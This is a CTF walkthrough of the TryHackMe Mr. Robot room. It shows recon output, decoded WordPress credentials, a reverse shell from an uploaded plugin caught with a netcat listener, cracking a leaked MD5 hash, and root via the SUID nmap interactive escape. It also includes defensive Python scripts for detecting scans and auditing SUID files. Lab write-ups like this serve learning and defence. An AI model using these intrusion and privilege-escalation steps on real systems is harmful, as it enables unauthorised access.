After the relative success of the previous room I completed on TryHackMe, it was time to try something slightly more challenging. I really enjoyed watching the show Mr. Robot last year, so when I saw a Mr. Robot-themed room of medium difficulty, I thought it was the perfect one to try.
The goal was simple: find the 3 hidden keys on the machine. There was no mention of a user.txt or root.txt this time, but it was a safe assumption that at least one of the keys would require some form of privileged access to obtain.
As is becoming somewhat of a pattern, I began by running a port scan against the machine to find out what services were running. The results showed that there wasn't much running other than a web server.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-04 16:06 CET
Nmap scan report for 10.10.149.92
Host is up (0.041s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https
Hidden Directory Searching
There's a web server running, which I already knew, since my gobuster command had started searching for directories. It found quite a lot of interesting things, most notably a WordPress instance.
┌──(gareth㉿SRF239-L)-[~/Desktop]
└─$ gobuster dir -u http://10.10.149.92 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.149.92
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/01/04 16:09:56 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/0 (Status: 301)
/admin (Status: 301)
/atom (Status: 301)
/audio (Status: 301)
/blog (Status: 301)
/css (Status: 301)
/dashboard (Status: 302)
/favicon.ico (Status: 200)
/feed (Status: 301)
/images (Status: 301)
/image (Status: 301)
/Image (Status: 301)
/index.html (Status: 200)
/index.php (Status: 301)
/intro (Status: 200)
/js (Status: 301)
/license (Status: 200)
/login (Status: 302)
/page1 (Status: 301)
/phpmyadmin (Status: 403)
/readme (Status: 200)
/rdf (Status: 301)
/robots (Status: 200)
/robots.txt (Status: 200)
/rss (Status: 301)
/rss2 (Status: 301)
/sitemap (Status: 200)
/sitemap.xml (Status: 200)
/video (Status: 301)
/wp-admin (Status: 301)
/wp-content (Status: 301)
/wp-includes (Status: 301)
/wp-config (Status: 200)
/wp-cron (Status: 200)
/wp-links-opml (Status: 200)
/wp-load (Status: 200)
/wp-login (Status: 200)
/wp-signup (Status: 302)
===============================================================
2021/01/04 16:18:37 Finished
===============================================================
Needless to say, I spent a bit of time manually navigating to these directories. Most of them didn't really contain anything, but it was fun to browse through the website and see the Mr. Robot-related text and apps that appeared.
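From the server's side, a wordlist scan like the gobuster run above is one client requesting a long series of paths in quick succession, most of them answered with 404 or 403. The following is an added example, not code from the original write-up: it parses combined-format (Apache/nginx) access log lines, groups the misses by client IP and flags any client that exceeds a threshold inside a sliding time window. The log lines, client addresses and threshold values are all constructed for the example.

```python
"""Spot directory brute-forcing in web server access logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined log format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for a well-formed log line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def find_scanners(lines, window_seconds=60, threshold=20, miss_codes=(403, 404)):
    """Map client IP -> peak number of misses seen in any `window_seconds` span.

    Only clients whose peak reaches `threshold` are returned.
    """
    misses = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] in miss_codes:
            misses[rec["ip"]].append(rec["ts"])

    flagged = {}
    for ip, times in misses.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            # slide the window start forward until it spans at most window_seconds
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            in_window = end - start + 1
            if in_window >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), in_window)
    return flagged


def build_sample_log():
    """Constructed sample: one client walking a wordlist plus a normal visitor."""
    base = datetime(2021, 1, 4, 16, 9, 56, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "GET {path} HTTP/1.1" {status} 0 "-" "{ua}"'
    lines = []
    for i in range(25):  # 25 misses, one per second, from the scanning client
        lines.append(fmt.format(ip="192.0.2.10",
                                ts=(base + timedelta(seconds=i)).strftime(TS_FMT),
                                path="/word%02d" % i, status=404, ua="gobuster/3.0.1"))
    for i, path in enumerate(["/", "/blog", "/robots.txt"]):  # ordinary browsing
        lines.append(fmt.format(ip="198.51.100.5",
                                ts=(base + timedelta(minutes=i)).strftime(TS_FMT),
                                path=path, status=200, ua="Mozilla/5.0"))
    lines.append("garbage line that does not parse")  # must be skipped, not crash
    return lines


if __name__ == "__main__":
    for ip, peak in find_scanners(build_sample_log()).items():
        print("possible directory scan from %s: %d misses in one window" % (ip, peak))
```

The threshold and window are deliberately parameters: a busy site with many broken links will need a higher bar than a small blog, and tuning them against a week of real logs before alerting on them is the usual approach.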
Finding the Keys
Key 1 of 3
Among the files found was a robots.txt, which is always interesting to take a look at, to see if there's anything specific the admin didn't want search engines to index.
As it happens, there was a file called key-1-of-3.txt listed there. Navigating to this file in the browser led me to the first key.
Also listed in this robots.txt file was another file, called fsocity.dic (this was probably supposed to be fsociety.dic). I downloaded this file and opened it. It appeared to be a password list for something.
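Because robots.txt is served to everyone, every Disallow entry is a pointer for a human reader as much as a crawler, which is exactly how the key file and the wordlist turned up here. The following is an added example, not code from the original write-up: a small checker a site owner can run over their own robots.txt to flag entries that look like secrets, wordlists or backups rather than ordinary crawl exclusions. The sample robots.txt content is constructed for the example (its two flagged entries reuse the filenames mentioned above); the name and extension patterns are an assumption, not an exhaustive list.

```python
"""Audit a robots.txt for Disallow entries that advertise sensitive files (added example)."""
import re

# Constructed heuristics: names and extensions that usually mean "not meant to be public".
SUSPICIOUS_NAME = re.compile(r"(key|secret|passw|backup|dump|private|credential)", re.I)
SUSPICIOUS_EXT = (".txt", ".dic", ".sql", ".bak", ".zip", ".tar", ".gz", ".old", ".env")


def parse_robots(text):
    """Return a list of (directive, value) pairs, ignoring comments and blank lines."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip trailing comments
        if not line or ":" not in line:
            continue
        directive, value = line.split(":", 1)
        rules.append((directive.strip().lower(), value.strip()))
    return rules


def audit_robots(text):
    """Return the Disallow values that look like they point at sensitive artefacts."""
    findings = []
    for directive, value in parse_robots(text):
        if directive != "disallow" or not value:
            continue
        # last path component, with a trailing slash removed so directories are checked too
        name = value.rstrip("/").rsplit("/", 1)[-1]
        if name.lower().endswith(SUSPICIOUS_EXT) or SUSPICIOUS_NAME.search(name):
            findings.append(value)
    return findings


# Constructed sample robots.txt for the example.
SAMPLE = """\
# example robots.txt
User-agent: *
Disallow: /wp-admin/
Disallow: /key-1-of-3.txt
Disallow: /fsocity.dic   # a wordlist nobody should be able to download
Allow: /
"""

if __name__ == "__main__":
    for entry in audit_robots(SAMPLE):
        print("robots.txt advertises a sensitive path:", entry)
```

The point of the check is not that the entries should be hidden better, but that files like these should not be web-accessible at all; robots.txt only tells well-behaved crawlers to stay away.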
Key 2 of 3
After inspecting the /license directory, I was presented with a message on the website which said:
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
Upon inspecting the source code for this page, I found what appeared to be a base64-encoded string.
┌──(gareth㉿SRF239-L)-[~/Desktop/Files/MrRobot]
└─$ echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d
elliot:ER28-0652
With these credentials, I was able to log in to the admin panel of the WordPress site located at http://10.10.149.92/wp-login.php.
I then used this access to upload a new WordPress plugin, which contained a reverse shell to my machine. I set up a listener with netcat and proceeded to activate the plugin.
┌──(gareth㉿SRF239-L)-[~/Desktop/Files/MrRobot]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.8.145.210] from (UNKNOWN) [10.10.149.92] 33519
bash: cannot set terminal process group (1755): Inappropriate ioctl for device
bash: no job control in this shell
daemon@linux:/opt/bitnami/apps/wordpress/htdocs$
Success. Now to find the key-2-of-3.txt file. A quick find command to locate the file and an ls -la revealed that the file is owned by the robot user. I was currently logged in as a user called daemon, so I needed to switch users somehow.
I changed directory to /home/robot and managed to find a file called password.raw-md5:
daemon@linux:/home/robot$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
I put this hash into crackstation.net, which immediately came back with the password. This allowed me to switch to the robot user and get the 2nd key.
daemon@linux:/home/robot$ su robot
Password:
robot@linux:~$ cat key-2-of-3.txt
<redacted>
robot@linux:~$
Key 3 of 3
Now to find the final key. For this, I needed root permissions on the box. A quick scan for any binary files with the SUID bit set which I could exploit returned the following list. See if you can spot the one I exploited.
I ran the nmap binary in interactive mode and from there spawned a shell.
Since this binary had the SUID bit set and so ran as the root user, my shell was also running as root. This then allowed me to capture the 3rd and final key.
robot@linux:~$ nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# cat /root/key-3-of-3.txt
<redacted>
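The root of the final step is a setuid-root binary that has no business being one. The following is an added example, not code from the original write-up, showing the defender's side of the same SUID scan: it walks the given directories, lists every regular file with the setuid bit and reports those whose name is not in an expected baseline, so a stray nmap or a copied shell stands out. The baseline is a constructed list of names that commonly carry setuid on Linux, not an authoritative one for any particular distribution; the intended use is to take a snapshot of a known-good host and diff against it.

```python
"""Inventory setuid files and flag ones outside an expected baseline (added example)."""
import os
import stat
import sys

# Constructed baseline: names that commonly carry setuid on Linux systems.
# Replace with a snapshot of a known-good host for real use.
EXPECTED_SUID = {
    "sudo", "su", "passwd", "mount", "umount", "ping",
    "chsh", "chfn", "newgrp", "gpasswd", "fusermount",
}


def find_suid(roots):
    """Return sorted paths of regular files with the setuid bit under `roots`.

    Symlinks are not followed (lstat), and unreadable entries are skipped.
    """
    found = []
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for fn in filenames:
                path = os.path.join(dirpath, fn)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                    found.append(path)
    return sorted(found)


def unexpected_suid(roots, baseline=EXPECTED_SUID):
    """Return setuid files whose basename is not in `baseline`."""
    return [p for p in find_suid(roots) if os.path.basename(p) not in baseline]


if __name__ == "__main__":
    # Usage: python3 suid_audit.py [dir ...]; defaults to the usual binary trees.
    roots = sys.argv[1:] or ["/usr", "/bin", "/sbin"]
    for p in unexpected_suid(roots):
        print("unexpected setuid file:", p)
```

On a Bitnami-style install, where applications live under /opt, the directories passed in should include that tree as well, since the default list only covers the system binary paths.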
Stabilizing the Shell
After doing a few of these CTF rooms, I have gotten into the habit of using Python to stabilize my shell. The shell you get with netcat does not come with many nice features, like the ability to clear the screen or autocomplete. In order to stabilize the shell, I first check whether Python is installed by running python3 --version. If it is installed, I then do the following to spawn a more stable shell.
When I am finished with the room and I exit back out to my host machine, I type reset and press return to set my own local shell back to its defaults.
This one required a good mixture of skills: a bit of hash cracking, a bit of web-based searching, some decoding, WordPress "exploiting" and a bit of privilege escalation at the end, taking advantage of SUID.
I enjoyed this box because of the theme and also because of its challenging nature. I hope I'm able to find and complete another medium box like it again soon.